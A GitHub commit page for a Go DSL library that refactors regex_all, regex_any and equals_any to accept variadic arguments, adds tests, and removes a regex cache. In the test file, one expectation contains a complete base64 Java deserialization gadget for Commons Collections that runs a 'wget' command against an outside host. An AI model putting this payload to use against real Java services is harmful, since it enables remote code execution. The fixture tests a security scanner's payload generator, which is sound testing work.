Skip to content

Commit 68ad2bb

Browse files
authored
refactor: support variadic args for regex_{all,any} and equals_any (#252)
Signed-off-by: Dwi Siswanto <[email protected]>
1 parent 0a96abc commit 68ad2bb

File tree

4 files changed

+169
-67
lines changed

4 files changed

+169
-67
lines changed

dsl.go

Lines changed: 52 additions & 23 deletions
Original file line numberDiff line numberDiff line change
@@ -706,38 +706,67 @@ func init() {
706706
}
707707
return compiled.MatchString(toString(args[1])), nil
708708
}))
709-
MustAddFunction(NewWithPositionalArgs("regex_all", 2, true, func(args ...interface{}) (interface{}, error) {
710-
for _, arg := range toStringSlice(args[1]) {
711-
compiled, err := Regex(toString(arg))
709+
MustAddFunction(NewWithSingleSignature("regex_all",
710+
"(pattern string, inputs ...string) bool",
711+
true,
712+
func(args ...interface{}) (interface{}, error) {
713+
if len(args) < 2 {
714+
return nil, ErrInvalidDslFunction
715+
}
716+
717+
compiled, err := regexp.Compile(toString(args[0]))
712718
if err != nil {
713719
return nil, err
714720
}
715-
if !compiled.MatchString(toString(args[0])) {
716-
return false, nil
721+
722+
for _, arg := range args[1:] {
723+
if !compiled.MatchString(toString(arg)) {
724+
return false, nil
725+
}
717726
}
718-
}
719-
return false, nil
720-
}))
721-
MustAddFunction(NewWithPositionalArgs("regex_any", 2, true, func(args ...interface{}) (interface{}, error) {
722-
for _, arg := range toStringSlice(args[1]) {
723-
compiled, err := Regex(toString(arg))
727+
728+
return true, nil
729+
}))
730+
MustAddFunction(NewWithSingleSignature("regex_any",
731+
"(pattern string, inputs ...string) bool",
732+
true,
733+
func(args ...interface{}) (interface{}, error) {
734+
if len(args) < 2 {
735+
return nil, ErrInvalidDslFunction
736+
}
737+
738+
pattern := toString(args[0])
739+
compiled, err := regexp.Compile(pattern)
724740
if err != nil {
725741
return nil, err
726742
}
727-
if compiled.MatchString(toString(args[0])) {
728-
return true, nil
743+
744+
for _, arg := range args[1:] {
745+
if compiled.MatchString(toString(arg)) {
746+
return true, nil
747+
}
729748
}
730-
}
731-
return false, nil
732-
}))
733-
MustAddFunction(NewWithPositionalArgs("equals_any", 2, true, func(args ...interface{}) (interface{}, error) {
734-
for _, arg := range toStringSlice(args[1]) {
735-
if args[0] == arg {
736-
return true, nil
749+
750+
return false, nil
751+
}))
752+
MustAddFunction(NewWithSingleSignature("equals_any",
753+
"(s interface{}, subs ...interface{}) bool",
754+
true,
755+
func(args ...interface{}) (interface{}, error) {
756+
if len(args) < 2 {
757+
return nil, ErrInvalidDslFunction
737758
}
738-
}
739-
return false, nil
740-
}))
759+
760+
s := toString(args[0])
761+
762+
for _, arg := range args[1:] {
763+
if toString(arg) == s {
764+
return true, nil
765+
}
766+
}
767+
768+
return false, nil
769+
}))
741770
MustAddFunction(NewWithPositionalArgs("remove_bad_chars", 2, true, func(args ...interface{}) (interface{}, error) {
742771
input := toString(args[0])
743772
badChars := toString(args[1])

dsl_test.go

Lines changed: 116 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -252,7 +252,7 @@ func TestGetPrintableDslFunctionSignatures(t *testing.T) {
252252
dec_to_hex(arg1 interface{}) interface{}
253253
deflate(arg1 interface{}) interface{}
254254
ends_with(str string, suffix ...string) bool
255-
equals_any(arg1, arg2 interface{}) interface{}
255+
equals_any(s interface{}, subs ...interface{}) bool
256256
generate_java_gadget(arg1, arg2, arg3 interface{}) interface{}
257257
generate_jwt(jsonString, algorithm, optionalSignature string, optionalMaxAgeUnix interface{}) string
258258
gzip(arg1 interface{}) interface{}
@@ -289,8 +289,8 @@ func TestGetPrintableDslFunctionSignatures(t *testing.T) {
289289
rand_text_alphanumeric(length uint, optionalBadChars string) string
290290
rand_text_numeric(length uint, optionalBadNumbers string) string
291291
regex(arg1, arg2 interface{}) interface{}
292-
regex_all(arg1, arg2 interface{}) interface{}
293-
regex_any(arg1, arg2 interface{}) interface{}
292+
regex_all(pattern string, inputs ...string) bool
293+
regex_any(pattern string, inputs ...string) bool
294294
remove_bad_chars(arg1, arg2 interface{}) interface{}
295295
repeat(arg1, arg2 interface{}) interface{}
296296
replace(arg1, arg2, arg3 interface{}) interface{}
@@ -381,9 +381,9 @@ func TestDslExpressions(t *testing.T) {
381381
`deflate("Hello")`: "\xf2\x48\xcd\xc9\xc9\x07\x04\x00\x00\xff\xff",
382382
`inflate(hex_decode("f348cdc9c90700"))`: "Hello",
383383
`inflate(hex_decode("f248cdc9c907040000ffff"))`: "Hello",
384-
`gzip_decode(hex_decode("1f8b08000000000000fff248cdc9c907040000ffff8289d1f705000000"))`: "Hello",
385-
`generate_java_gadget("commons-collections3.1", "wget https://{{interactsh-url}}", "base64")`: "rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAJmh0dHBzOi8vZ2l0aHViLmNvbS9qb2FvbWF0b3NmL2pleGJvc3Mgc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl%2BwoepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAAFc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnRxAH4AA3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh%2Bj/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AGwAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB%2BABtzcQB%2BABN1cQB%2BABgAAAACcHVxAH4AGAAAAAB0AAZpbnZva2V1cQB%2BABsAAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAYc3EAfgATdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQAH3dnZXQgaHR0cHM6Ly97e2ludGVyYWN0c2gtdXJsfX10AARleGVjdXEAfgAbAAAAAXEAfgAgc3EAfgAPc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4eA==",
386-
`generate_jwt("{\"name\":\"John Doe\",\"foo\":\"bar\"}", "HS256", "hello-world")`: []byte("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIiLCJuYW1lIjoiSm9obiBEb2UifQ.EsrL8lIcYJR_Ns-JuhF3VCllCP7xwbpMCCfHin_WT6U"),
384+
`gzip_decode(hex_decode("1f8b08000000000000fff248cdc9c907040000ffff8289d1f705000000"))`: "Hello",
385+
`generate_java_gadget("commons-collections3.1", "wget http://scanme.sh", "base64")`: "rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAJmh0dHBzOi8vZ2l0aHViLmNvbS9qb2FvbWF0b3NmL2pleGJvc3Mgc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl%2BwoepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAAFc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnRxAH4AA3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh%2Bj/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AGwAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB%2BABtzcQB%2BABN1cQB%2BABgAAAACcHVxAH4AGAAAAAB0AAZpbnZva2V1cQB%2BABsAAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAYc3EAfgATdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQAFXdnZXQgaHR0cDovL3NjYW5tZS5zaHQABGV4ZWN1cQB%2BABsAAAABcQB%2BACBzcQB%2BAA9zcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh4",
386+
`generate_jwt("{\"name\":\"John Doe\",\"foo\":\"bar\"}", "HS256", "hello-world")`: []byte("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIiLCJuYW1lIjoiSm9obiBEb2UifQ.EsrL8lIcYJR_Ns-JuhF3VCllCP7xwbpMCCfHin_WT6U"),
387387
`base64_decode("SGVsbG8=")`: "Hello",
388388
`hex_decode("6161")`: "aa",
389389
`len("Hello")`: float64(5),
@@ -703,3 +703,113 @@ func Test_Zlib_decompression_bomb(t *testing.T) {
703703
// Cannot be greater than 10MB
704704
require.LessOrEqual(t, int64(len(actualResult.(string))), DefaultMaxDecompressionSize, "The result is too large")
705705
}
706+
707+
func TestRegexFunctions(t *testing.T) {
708+
t.Run("regex", func(t *testing.T) {
709+
tests := map[string]interface{}{
710+
`regex("H([a-z]+)o", "Hello")`: true,
711+
`regex("\\d+", "abc")`: false,
712+
`regex("[a-z]+", "123")`: false,
713+
`regex("^\\d+$", "123abc")`: false,
714+
`regex("(?i)HELLO", "hello")`: true,
715+
`regex("^$", "")`: true,
716+
`regex("\\s+", "nospaces")`: false,
717+
`regex("\\s+", "has some spaces")`: true,
718+
`regex("^\\w+@\\w+\\.\\w+$", "[email protected]")`: true,
719+
}
720+
testDslExpressions(t, tests)
721+
})
722+
723+
t.Run("regex_all", func(t *testing.T) {
724+
tests := map[string]interface{}{
725+
// Basic numeric tests
726+
`regex_all("\\d+", "123", "456", "789")`: true,
727+
`regex_all("\\d+", "123", "abc", "789")`: false,
728+
`regex_all("\\d+", "abc", "def", "ghi")`: false,
729+
730+
// Pattern matching tests
731+
`regex_all("[a-z]+", "abc", "def", "ghi")`: true,
732+
`regex_all("[A-Z]+", "ABC", "DEF", "GHI")`: true,
733+
`regex_all("^[a-z]$", "a", "b", "c")`: true,
734+
`regex_all("^\\w+$", "abc", "123", "abc123")`: true,
735+
736+
// Edge cases
737+
`regex_all("^$", "", "", "")`: true,
738+
`regex_all(".*", "", "abc", "123")`: true,
739+
`regex_all("^\\s*$", " ", " ", " ")`: true,
740+
`regex_all("^\\s+$", " ", " ", " ")`: true,
741+
742+
// Email pattern test
743+
`regex_all("^\\w+@\\w+\\.\\w+$", "[email protected]", "[email protected]")`: true,
744+
`regex_all("^\\w+@\\w+\\.\\w+$", "[email protected]", "invalid")`: false,
745+
746+
// Case sensitivity tests
747+
`regex_all("(?i)test", "TEST", "Test", "test")`: true,
748+
`regex_all("test", "TEST", "Test", "test")`: false,
749+
}
750+
testDslExpressions(t, tests)
751+
})
752+
753+
t.Run("regex_any", func(t *testing.T) {
754+
tests := map[string]interface{}{
755+
// Basic numeric tests
756+
`regex_any("\\d+", "123", "abc", "789")`: true,
757+
`regex_any("\\d+", "abc", "def", "ghi")`: false,
758+
`regex_any("\\d+", "123", "456", "789")`: true,
759+
760+
// Pattern matching tests
761+
`regex_any("[a-z]+", "ABC", "def", "GHI")`: true,
762+
`regex_any("[A-Z]+", "abc", "def", "GHI")`: true,
763+
`regex_any("^[a-z]$", "1", "b", "2")`: true,
764+
`regex_any("^\\w+$", "!!!", "@#$", "abc123")`: true,
765+
766+
// Edge cases
767+
`regex_any("^$", "a", "b", "")`: true,
768+
`regex_any("^$", "a", "b", "c")`: false,
769+
`regex_any("^\\s+$", "abc", " ", "def")`: true,
770+
771+
// Email pattern test
772+
`regex_any("^\\w+@\\w+\\.\\w+$", "invalid", "[email protected]")`: true,
773+
`regex_any("^\\w+@\\w+\\.\\w+$", "invalid1", "invalid2")`: false,
774+
775+
// Case sensitivity tests
776+
`regex_any("(?i)test", "ABC", "Test", "xyz")`: true,
777+
`regex_any("test", "TEST", "TEST", "TEST")`: false,
778+
}
779+
testDslExpressions(t, tests)
780+
})
781+
}
782+
783+
func TestEqualAnyFunction(t *testing.T) {
784+
t.Run("equals_any", func(t *testing.T) {
785+
tests := map[string]interface{}{
786+
// Basic string matching tests
787+
`equals_any("test", "test", "foo", "bar")`: true,
788+
`equals_any("foo", "test", "bar", "baz")`: false,
789+
`equals_any("hello", "hello", "world")`: true,
790+
`equals_any("world", "hello", "world")`: true,
791+
`equals_any("none", "hello", "world")`: false,
792+
793+
// Empty string tests
794+
`equals_any("", "", "test")`: true,
795+
`equals_any("test", "", "test")`: true,
796+
`equals_any("", "test", "foo")`: false,
797+
798+
// Case sensitivity tests
799+
`equals_any("TEST", "test", "Test", "TEST")`: true,
800+
`equals_any("test", "TEST", "Test")`: false,
801+
802+
// Special characters tests
803+
`equals_any("test.com", "test.com", "test-com")`: true,
804+
`equals_any("test-com", "test.com", "test_com")`: false,
805+
`equals_any("test@123", "test@123", "test123")`: true,
806+
807+
// Numeric value tests (converted to string)
808+
`equals_any("123", "123", "456", "789")`: true,
809+
`equals_any("123", 123, "456", "789")`: true,
810+
`equals_any(123, "123", "456", "789")`: true,
811+
`equals_any("123", "456", "789")`: false,
812+
}
813+
testDslExpressions(t, tests)
814+
})
815+
}

engine.go

Lines changed: 1 addition & 20 deletions
Original file line numberDiff line numberDiff line change
@@ -1,17 +1,12 @@
11
package dsl
22

33
import (
4-
"regexp"
54
"sync"
65

76
"github.com/Knetic/govaluate"
8-
mapsutil "github.com/projectdiscovery/utils/maps"
97
)
108

11-
var (
12-
defaultEngine *Engine
13-
RegexStore = &mapsutil.SyncLockMap[string, *regexp.Regexp]{Map: make(mapsutil.Map[string, *regexp.Regexp])}
14-
)
9+
var defaultEngine *Engine
1510

1611
type Engine struct {
1712
HelperFunctions map[string]govaluate.ExpressionFunction
@@ -60,17 +55,3 @@ func EvalExpr(expr string, vars map[string]interface{}) (interface{}, error) {
6055

6156
return defaultEngine.EvalExprFromCache(expr, vars)
6257
}
63-
64-
func Regex(regxp string) (*regexp.Regexp, error) {
65-
if compiled, ok := RegexStore.Get(regxp); ok {
66-
return compiled, nil
67-
}
68-
69-
compiled, err := regexp.Compile(regxp)
70-
if err != nil {
71-
return nil, err
72-
}
73-
_ = RegexStore.Set(regxp, compiled)
74-
75-
return compiled, nil
76-
}

util.go

Lines changed: 0 additions & 18 deletions
Original file line numberDiff line numberDiff line change
@@ -78,24 +78,6 @@ func toString(data interface{}) string {
7878
}
7979
}
8080

81-
func toStringSlice(v interface{}) (m []string) {
82-
switch vv := v.(type) {
83-
case []string:
84-
for _, item := range vv {
85-
m = append(m, toString(item))
86-
}
87-
case []int:
88-
for _, item := range vv {
89-
m = append(m, toString(item))
90-
}
91-
case []float64:
92-
for _, item := range vv {
93-
m = append(m, toString(item))
94-
}
95-
}
96-
return
97-
}
98-
9981
func insertInto(s string, interval int, sep rune) string {
10082
var buffer bytes.Buffer
10183
before := interval - 1

0 commit comments

Comments
 (0)